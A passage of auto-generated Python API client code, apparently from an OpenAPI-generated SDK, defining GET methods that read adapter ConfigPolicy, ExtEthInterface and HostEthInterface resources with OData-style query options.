all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_config_policy_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_config_policy_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_config_policy_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterConfigPolicyList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_config_policy_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_config_policy_list_with_http_info(self,
**kwargs): # noqa: E501
"""Read a 'adapter.ConfigPolicy' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_config_policy_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterConfigPolicyList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_config_policy_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ConfigPolicies',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterConfigPolicyList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_ext_eth_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterExtEthInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_ext_eth_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_ext_eth_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterExtEthInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_ext_eth_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_ext_eth_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ExtEthInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterExtEthInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_ext_eth_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterExtEthInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_ext_eth_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_ext_eth_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.ExtEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_ext_eth_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterExtEthInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_ext_eth_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/ExtEthInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterExtEthInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_eth_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostEthInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_eth_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_eth_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostEthInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_eth_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_eth_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostEthInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostEthInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_eth_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostEthInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_eth_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_eth_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.HostEthInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_eth_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostEthInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_eth_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
